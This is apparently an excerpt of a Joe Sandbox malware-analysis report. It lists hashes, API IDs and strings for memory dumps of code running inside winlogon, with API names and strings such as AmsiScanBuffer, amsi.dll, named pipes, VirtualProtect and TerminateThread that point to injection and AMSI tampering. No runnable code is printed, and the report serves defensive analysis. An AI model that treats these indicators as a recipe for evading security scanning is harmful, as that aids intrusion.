                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: c0e29f2d3459f78ac5c5c32710ade1ac8fc7e6770d5076c999ee149a55dd3a23
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: 7C11702D71CE7072FA5867F9A81D36F3252AB85792F54C6B4E967563C6DE38C401C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: a875aa4653512ee24e7d2212af4580c3c98327b6d20060586ee3abada98c9fb9
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: E911863D314E7072FA54A7F9681D36E1251AB84792F54CE24E9776ABC6DE38C402C341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: 94ee8105368b08318b792b932de3e76bbedc80c5542e1ae07ef22bd2515019d7
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: DC11512D304F7072FA54E7F9681D3AE1252AB85792F64C624E967D77D6DE38C801C305
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 3604fe474655a38b0f3721542f876a5644352f74d76c3b4a2e8730e16adc028e
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: DD018C29718F5092EB10DB9AE85C35963A1FB88FC2F988034DE8E43754EE3CC985C780
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 4a60fd448daebfd72795b6413df16e4f1a81462a1859d3eee0ae49abe6fc46b7
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: A6016D29700F5092FB10DB96A85835963A1FB88FC1F8880359F8E43B94EE3CC585C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 9d224b656b0d703d09ba38f737460bb298f286a38324a2de4420a0ae5527c575
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 54018029704F5092EB50DB56A85C39963A2FB98FC2F588034DF4E83754EE3CC985C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 4a224200a1e07b0aa4b0f67563cfd423e6d0e7cb75ac0349936645944c2c672a
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: FD014069215F5492FB249BA9E84C71973B0BB44B46F148025CA4E07364FF3DC158C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 28ee697f69cd14e2f65aa827ec224f3f02d22da3cf0d46f4e686ddecb0b490c7
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: BE012969211F60D2FB24DBA9E84C72973A0BF48B86F148429CA4E1A7A4EF3DC558C701
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: ab23a074c30d33cec9196f70a45b9b9b6c566c72c629068fdab6f0c945d971e0
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: AA018C68605F6092FB64DBA9E84C35A33B1BB58B43F148029DE4E463A5FF3DC058C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 23338ead537532c8caedcb1fbae1bb11a2aca6ea46d22c4fdef3c545eb0c50d9
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: C9F06866318E99A2EB308B69F5CC3596361F744B89FD4C021DA4D46964FF7CC689C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 4de7272655647ac2e6424b4b9f36712cc216d6265d6778c1ebfa06a94f57073d
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 8BF04F66304B95A2FB20CB69F5883596361FB44B8AFC4C022DB4D469E4EE7CC689CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 9b95f1bc886aa21015f3c636c214912d2661507336fea6dcc658da160b3cf62b
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 39F06866304E95A2EB70CB69F5D8399A361F754B8AFC4C021DA4D46A64EF7CC689C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: caf476503057f11d1a7c5d1c6dddbb9f0f6eb92e39bb7f9162a27a7a401aa55a
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: E2F08268328FA8A1EA048B9BB91C1196260BB48FC2F54C071EE5A47B18EE3CC445C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 938350a4e3eac13a7d6da2a12f3dfbe309c4e71c2eac7caab4b5b05b25c44deb
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: BEF0B429328F11A1EF148BACE89C3696320EB897A3F648719DA6B452E4DF3CC448C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: 24d806c00f7d8b8aa420d54ca5f131aedf9321a7565e3ac79e356d0cb450555e
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 94F08C68304FA4A2FA14DB9BB918119A260BF48FC2F58C031EF0A07B98EF3CC485C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 7d74a49b79ec5a1d9e2b15a83ae438bcec76a5ac0fd3da8307343e440d14b90d
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 18F09029200E11A1FA10CBA8A8983692320EF89762F948619DA7A455E4DF3CC888C341
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: 7fdb6d42a7fb40fc05a2f29626bbbe8cd075efa84b4cb5aa8c639b9e77abc44d
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 01F08C68304FA4A2EA448B9BB918199A262BB58FC3F58C031EE0A47B18EE3CC445C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 36650ad3afa31a12c84cd94ac0cf0e59a4e97d9c091bbc718799aef0be984865
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 70F0B429305F21A1EB148BACE89D3696321EB89763F648329DA6A452E4DF3CC448C304
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: 2d200bc079b72c6091f717144033fbdd2476b67251398bd4ef628c8009597c81
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 85D06718611E24F5FA19EB9DEC5C3542261AF64B03FC48416C50E016E0FE3C8559D342
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: ac9e8dff82c6691497a52a828f837e14efe85b766a2d60bf20cf03255d363ac5
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 3DD06718615E24F5EA59AB9DE85C3942263BB74B03FD48415C50E453A0EF3C9559C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
